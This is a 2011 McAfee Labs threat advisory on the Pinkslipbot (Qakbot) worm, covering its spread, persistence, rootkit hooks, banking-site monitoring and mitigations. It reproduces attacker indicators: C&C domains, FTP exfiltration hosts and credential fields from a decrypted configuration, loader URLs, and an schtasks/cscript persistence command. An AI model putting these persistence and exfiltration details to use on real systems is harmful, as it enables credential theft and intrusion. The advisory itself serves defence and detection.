McAfee Labs Threat Advisory

W32/Pinkslipbot
May 26, 2011

Summary
The W32/Pinkslipbot worm is capable of spreading over network shares, downloading files, and updating its
software. Additionally it is capable of receiving back door command from its IRC command and control
center. It attempts to steal user information and upload it to FTP sites.

Aliases:
 Qakbot
 Akbot
 Qbot

Detailed information about the worm, its propagation, and mitigation are in the following sections:

 Infection and Propagation Vectors

 Prevalence Information
 Characteristics and Symptoms
 Rootkit Behavior
 Restart Mechanism
 NTFS Folder Permission Alteration
 Getting Help from the McAfee Foundstone Services team

Infection and Propagation Vectors

There are two infection and propagation vectors that Pinkslipbot primarily uses to spread itself. Below are the
description and mitigation for each one.

Exploits
Many Pinkslipbot infections had been reported to be propagated by exploiting web related vulnerabilities.
Known vulnerabilities used to propagate this threat include:

o Vulnerability in the Microsoft Data Access Components (MDAC) Function

o http://support.microsoft.com/kb/870669
o http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx
o Apple Quicktime RTSP URL Handler Stack-based Buffer Overflow
o http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4673
o http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015
o Adobe getIcon Stack-based buffer overflow
o http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927
o MsVidCtl Overflow in Microsoft Video ActiveX Control
o http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-0015
o Adobe Reader and Acrobat CoolType.dll Font Parsing Buffer Overflow Vulnerability
o http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2883

Mitigation
It is recommended that all computer systems are updated with the latest vendor patches, not limited to the
vulnerabilities mentioned above.

In addition, restriction of scripting and browser plugins for document files and media players can also further
mitigate risks of malware bypassing certain browser security.
Network Shares
Pinkslipbot is known to spread over open shares such as C$ and ADMIN$. If an open network share is found,
Pinkslipbot related files are copied over to the share and executed remotely.

Mitigation
o Enforce a strict password policy on all network shares and allow write permissions to only trusted
accounts that need it.
o Though this may not apply to all Pinkslipbot variants, it is recommended to turn off Autorun
functionality (http://support.microsoft.com/kb/967715).

USB and Removable Drives

Pinkslipbot can also spread over removable drives. Once the machine is infected, it will monitor for an
attached drive. If found it will create a copy of itself with the same filename of any directory on the drive.

Mitigation:

o Disable the Autorun feature on Windows. You can do this remotely using Windows Group Policies.
o Restrict the use of USB drives in mission-critical and server machines.
o Implement and test Access Protection Rules using VirusScan Enterprise to prevent writing of
AUTORUN.INF files.

Prevalence Information
Following graph captures the prevalence information seen in field for W32/Pinkslipbot infections. This data is
captured from the McAfee Virus Map. The graph shows the daily distribution unique IP addresses reporting
infections for this threat in May 2011:

A quick view at distribution of these infections across countries concludes that W32/Pinkslipbot threat is
primarily dominant in US:
A Google map view (North America) for reported infections on Pinkslipbot in May 2011 is presented below:

W32/Pinkslipbot is known to evolve continuously. McAfee has seen many unique variants of this malware in
2011. Following graph captures week wise distribution of unique variants seen till date in 2011:

Characteristics and Symptoms

Description
An executable is downloaded as a result of an initial infection. The exe contains an encrypted DLL and
configuration file which are dropped and utilized for initialization and injection. The DLL file is loaded into the
exe’s process memory. It sets up hooks (Rootkit Behavior section) in multiple processes for data gathering
and information stealing purposes. Pinkslipbot also injects its DLL code into some processes such as:
 o iexplore.exe
o outlook.exe
o firefox.exe
o opera.exe
o skype.exe
o msnmsgr.exe
o yahoomessenger.exe
o chrome.exe
o msmsgs.exe

The injected code then attempts to reach out to the Internet to gather other configuration files and updates.
In older variants, configuration information was available via a password protected ZIP archive with a static
password "Hello999W0rld777".

The Exe, DLL and other configuration files are typically stored under a randomly named sub folder within the
following folder:

o %AllUsersProfile%\Application Data\Microsoft\

The configuration file is encrypted. On decryption it contains C&C and FTP Server information. The following
is an example of such a decrypted configuration file:

cc_server_port=16768
cc_server_pass=Ijadsnanunx56512
p2p_node_lst=http://bckp01.in/cgi-bin/ls1.pl
ftphost_1=216.227.214.95:cpanel@silfersystem.com:[Password]:
ftphost_2=72.29.86.119:cpanel@gemini.com.co:[Password]:
ftphost_3=66.219.30.219:cpanel@falahuddarain.com:[Password]:
ftphost_4=110.4.45.64:cpanel@karnadya.com.my:[Password]:
ftphost_5=74.220.215.107:cpanel@incitylocal.com:[Password]:
update_conf_ver=908

Once installed, a user mode rootkit hides these files from GUI-based applications. A cmd.exe listing however,
would allow one to list the files.

Some of the filenames observed on an infected system include:

o _qbotnti.exe
o q3.dll
o _qbotinj.exe
o q2l.exe
o q1.dll
o Start Menu\Programs\Startup\startup.bat
o si.txt
o File names containing "_irc"
o nbl_*.txt
o removeme.txt
o alias_qa.zip
o *_*.kcb
o alias__qbotnti.exe
o alias_si.txt
o alias__qbot.cb
o resume.doc
o sconnect.js
o alias_seclog.txt
o updates.cb
o updates_*new.cb
o _installed
o uninstall.tmp
o qbot.cb
o _qbot.cb
 o [random].job
o Mpr.dll

The malware has key logging, password stealing abilities, certificate stealing, and attempts to collect
geographic, OS, IP, e-mail addresses, URLs visited, and other system information. Such information is sent
to compromised FTP hosts as shown below.

As seen above, the malware uploads the stolen information in the file names seclog*.kcb and
ps_dump.Administrator_*.kcb, with the latter one containing the stolen password information.

Network connections may be made on the following network ports:

o 80
o 21
o 31666
o 16666-16669

Network connections are known to be made to the following domains:

o hostrmeter.com
o boogiewoogiekid.com
o nt002.cn
o nt12.co.in
o nt14.co.in
o nt16.in
o hotbar.com
o cdcdcdcdc2121cdsfdfd.com
o up002.cn
o adserv.co.in
o up004.cn
o up01.co.in
o nt002.cn
o nt010.cn
o nt202.cn
o cdcdcdcdc2121cdsfdfd.com
o up02.co.in
o up03.in
o up003.com.ua
 o nt15.in
o nt17.in
o swallowthewhistle.com
o hotbar.com
o redserver.com.ua
o nt04.in
o nt06.in
o nt101.cn
o b.nt002.cn
o b.tn001.cn
o b.rtbn2.cn
o prstat.in
o citypromo.info
o du01.in
o du02.in
o yimg.com.ua
o spotrate.info
o ppcimg.in
o laststat.co.in
o bckp01.in

In addition, it can also monitor traffic to URLs that contain the following:

o iris.sovereignbank.com
o /wires/
o paylinks.cunet.org
o securentrycorp.amegybank.com
o businessbankingcenter.synovus.com
o businessinternetbanking.synovus.com
o ocm.suntrust.com
o cashproonline.bankofamerica.com
o singlepoint.usbank.com
o netconnect.bokf.com
o business-eb.ibanking-services.com
o cashproonline.bankofamerica.com
o /cashplus/
o ebanking-services.com
o /cashman/
o web-cashplus.com
o treas-mgt.frostbank.com
o business-eb.ibanking-services.com
o treasury.pncbank.com
o access.jpmorgan.com
o tssportal.jpmorgan.com
o ktt.key.com
o onlineserv/CM
o premierview.membersunited.org
o directline4biz.com
o .webcashmgmt.com
o Tmconnectweb
o moneymanagergps.com
o ibc.klikbca.com
o directpay.wellsfargo.com
o express.53.com
o itreasury.regions.com
o itreasurypr.regions.com
o cpw-achweb.bankofamerica.com
o businessaccess.citibank.citigroup.com
 o businessonline.huntington.com
o /cmserver/
o goldleafach.com
o ub-businessonline.blilk.com
o iachwellsprod.wellsfargo.com
o achbatchlisting
o /achupload
o commercial3.wachovia.com
o wc.wachovia.com
o commercial.wachovia.com
o wcp.wachovia.com
o chsec.wellsfargo.com
o wellsoffice.wellsfargo.com
o /stbcorp/
o /payments/ach
o trz.tranzact.org
o /wiret
o /payments/ach
o cbs.firstcitizensonline.com
o /corpach/

During our investigation of multiple variants of this threat, we observed following variations in the HTTP
POST request and URLs sent to the C&C server.

o http://<domain-name>/cgi-bin/jl/jloader.pl?r=q/qa.bin&n=bthes7664&it=3&b=18
o http://<domain-name>/cgi-bin/jl/jloader.pl?r=q/qa.bin&n=jpwel2451&it=2&b=6
o http://<domain-name>/cgi-bin/jl/jloader.pl?u=u/updates_usoqc8673.cb
o http://<domain-name>/cgi-bin/jl/jloader.pl?u=u/updates.cb
o http://<domain-name>/cgi-bin/jl/jloader.pl?u=u/updates_usoqc8673.cb
o http://<domain-name>/cgi-bin/jl/jloader.pl?r=q/we.js?u=usoqc8673&v=piuv8
o http://<domain-name>/cgi-bin/jl/jloader.pl?r=q/qa.zip&uninstall=ppozu1276
o http://<domain-name>/cgi-bin/jl/jloader.pl?r=q/qa.bin&n=zzekr1617&it=2&b=197//u/updates.cb
o http://<domain-name>/cgi-bin/jl/jloader.pl?loadfile=q/q2_force_exec_success
o http://<domain-name>/cgi-bin/jl/jloader.pl?loadfile=q/q2_irc_nick_
o http://<domain-name>/cgi-bin/clientinfo3.pl?cookie=socks-1-1580-zevhd0018
o http://<domain-name>/cgi-bin/clientinfo3.pl?cookie=sysinfo-0-1580-zevhd0018
o http://zurnretail.com/cgi-bin/clientinfo3.pl?cookie=socks-0-1412-qpckb8049
o http://zurnretail.com/cgi-bin/clientinfo3.pl?cookie=sysinfo-1-1412-qpckb8049
o http://swallowthewhistle.com/cgi-bin/clientinfo3.pl?cookie=sysinfo-43-2716-fzrmj8460

Note: <domain-name> vary based on the active C&C server.

Pinkslipbot attempts to steal the following information from infected hosts:

o POP3, IMAP, NNTP, Email, SMTP Passwords

o Keystrokes
o Digital Certificates
o HTTP Session information

Some newer samples were observed to have valid stolen digital signatures.

Mitigation

o Where possible, configure the perimeter and/or desktop firewall to restrict connections to the
reported network ports, URLs and domain names.
o Users who have been known to be infected should change their passwords.
o Always ensure you have the latest DATs installed for McAfee Virus Scan Product. The latest DAT at
the time this document was updated is DAT 6354.
o For customers with McAfee Network Security Platform (NSP) product we recommend to enable the
 following attacks.
o To detect the vulnerabilities being exploited by W32/Pinkslipbot:
 0x40231a00 - HTTP: Apple QuickTime RTSP URL Buffer Overflow
 0x4021dd00 - HTTP: Microsoft Internet Explorer ADODB.Stream Object File
Installation
o To detect W32/Pinkslipbot infected victims on the network:
 0x48804e00 - BOT: Quakbot (PinkSlip) Traffic Detected

Rootkit Behavior
Some variants of this malware have also been known to install a rootkit component to hide its presence,
including its running process and registry entries. In such cases, the malware will be hidden from normal
process viewers and registry editors such as Task Manager and regedit.exe. The following are system APIs
that are hooked to accomplish this:

o ntdll.dll!NtQuerySystemInformation
o kernel32.dll!GetProcAddress
o kernel32.dll!FindFirstFileA
o kernel32.dll!FindNextFileA
o kernel32.dll!FindFirstFileW
o kernel32.dll!FindNextFileW
o user32.dll!CharToOemBuffA
o user32.dll!GetClipboardData
o advapi32.dll!RegEnumValueW
o advapi32.dll!RegEnumValueA
o ws2_32.dll!connect
o ws2_32.dll!send
o ws2_32.dll!WSASend
o ws2_32.dll!WSAConnect
o iphlpapi.dll!GetTcpTable
o iphlpapi.dll!AllocateAndGetTcpExTableFromStack
o wininet.dll!HttpSendRequestA
o wininet.dll!HttpSendRequestW
o wininet.dll!InternetReadFile
o wininet.dll!InternetReadFileA
o wininet.dll!InternetCloseHandle
o wininet.dll!InternetQueryDataAvailable
o wininet.dll!HttpOpenRequestA
o wininet.dll!HttpOpenRequestW
o dnsapi.dll!DnsQuery_A
o dnsapi.dll!DnsQuery_W

At the time of research, some existing executables that it prevents hooking are:
o msdev.exe
o dbgview.exe
o mirc.exe
o ollydbg.exe
o ctfmon.exe

Pinkslipbot prevents user DNS queries to resolve when connecting to sites containing the following strings:

webroot defender Kaspersky spyware

agnitum drweb malware sunbelt
ahnlab emsisoft mcafee Symantec
arcabit esafe microsoft Threatexpert
avast eset networkassociates Trendmicro
avg etrust nod32 virus
avira ewido norman wilderssecurity
avp fortinet Norton windowsupd
bitdefender f-prot Panda
bit9 f-secure Pctools
castlecops gdata Prevx
centralcommand grisoft quickheal
clam hacksoft rising
av hauri rootkit
comodo ikarus securecomputing
computerassociates jotti sophos
cpsecure k7computing spamhaus

Restart Mechanism

Description
Pinkslipbot executables accept the following parameters:

/i – Drops a DLL and a configuration file

/s – if passed with the configuration file, runs Pinkslipbot in service mode
/t – terminate
/c – if passed with a executable name, it would run the executable.

As a restart mechanism, Pinkslipbot will attempt to modify an existing “Run” registry key to include its own
EXE and DLL. The original executable pointed to by the “Run” key will be included in its “Run” Path and
launched with a "/c" switch.

As an example, it will modify an existing Run key such as:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[Original] = [Path to Original]
to:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[Original] = <random >.exe <random >.dll /c [Path to Original]

In newer variants, the Run key may be modified to:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[Original] = <random>.exe /s <Pinkslipbot config file>

Pinkslipbot uses a second restart mechanism. It saves a JavaScript (JS) file in the Windows System32 folder.
The name of this file is typically sconnect.js. Newer variants have random named JS files.

A Windows Task Scheduler job is then created which launches this JS script. This job is scheduled to run
hourly. The JS file is also crafted to connect to malicious sites to download an update to the Pinkslipbot
components. The following is the task setup:

o %windir%\system32\schtasks.exe" /create /tn [TaskName] /tr "%windir%\system32\cscript.exe

//E:javascript [JavaScript File]" /sc HOURLY /mo 4 /ru

Mitigation

o Create and test a VirusScan Access Protection Rule (APR) to prevent cscript.exe and wscript.exe
processes from reading and executing files from the %UserProfile% folder, where feasible.
o Create and test a VirusScan Access Protection Rule (APR) for “updates_*new.cb”, “upd_*.cb” and
“updates*_new.cb”. These are usually used as Pinkslipbot configuration files. Blocking these files can
prevent the malware from updating.

NTFS Folder Permission Alteration

Around December 2010, new variants of Pinkslipbot were observed to be modifying NTFS permissions for
folders where security products are installed. This modification is possible only when Pinkslipbot is allowed to
infect when the user is logged in with Administrator privileges.

When successful, NTFS permissions for security related folders are removed, such as access is prevented
from administrators and system processes. Effectively, security products will not be allowed by the Windows
Operating System to run without the appropriate permissions.

For example, the following McAfee folders are targeted:

o %AllUsersProfile%\Application Data\McAfee
o %ProgramFiles%\McAfee

Due to this change, files running from these locations will have permissions denied by the Windows
Operating System. In some cases there have been reports that PinkslipBot has been disabling permissions
from the %ProgramFiles% folder. In such cases many common user applications would be impacted.

Mitigation
Users should not be logged in with administrative privileges for daily use, except to perform specific
administrator tasks. This helps deny the malware from altering folder and system permissions.

Remediation
o A custom Stinger tool is provided by McAfee Labs upon request to restore modified NTFS
permissions. You must run the Stinger tool with a user account with Administrator privileges. It will
restore the original NTFS permissions to allow McAfee programs to be loaded.

o As an alternative, manual instructions to restore the folder’s permissions are as follows:

1. Open Windows Explorer as Administrator and right-click the icon for the affected folder(s).
2. Click into “Properties” to access the folder properties.
3. Under the “Security” tab, click “Advanced”, then “Owner”.
4. Choose the Administrator as Owner (or some user with Administrator privilege).
5. Click OK when prompted to apply changes.
6. Return to the Security tab under “Properties” again.
7. Click “Advanced”, and select “Inherit from parent the permissions entries that apply to child
objects”.
8. Click OK when prompted to apply changes.

o Reboot the infected machine to restart all critical services.

Getting Help from the McAfee Foundstone Services team

This document is intended to provide a summary of current intelligence and best practices to ensure the
highest level of protection from your McAfee security solution. The McAfee Foundstone Services team offers a
full range of strategic and technical consulting services that can further help to ensure you identify security
risk and build effective solutions to remediate security vulnerabilities.

You can reach them here: https://secure.mcafee.com/apps/services/services-contact.aspx

© 2011 McAfee, Inc. All rights reserved.